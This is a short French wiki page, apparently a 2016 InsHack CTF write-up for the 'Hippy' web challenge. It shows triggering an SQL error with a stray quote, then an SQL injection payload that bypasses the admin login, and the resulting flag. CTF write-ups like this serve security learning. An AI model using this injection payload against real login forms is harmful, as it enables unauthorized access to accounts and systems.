Outils pour utilisateurs
ctf:2016:inshack:web50_hippy
WEB 50 - Hippy
Nous voici sur un site controlé par des hippies , il faut absolument accèder à la page admin !
Nous allons essayer de faire renvoyer une erreur par le formulaire pour voir comment nous pouvons l'exploiter.
username=admin&pass=test"
Gagné , une injection sql est possible :)
Nous allons bypasser l'authentification :
username=admin&pass=test" or "a"="a" limit 1#
Le flag est à nous : FLAG{Non, c'est quand je suis content je vomi, et là, là je suis super content.}
ctf/2016/inshack/web50_hippy.txt · Dernière modification: 2016/07/04 08:39 (modification externe)
Outils de la page
Sauf mention contraire, le contenu de ce wiki est placé sous les termes de la licence suivante : CC Attribution-Share Alike 4.0 International
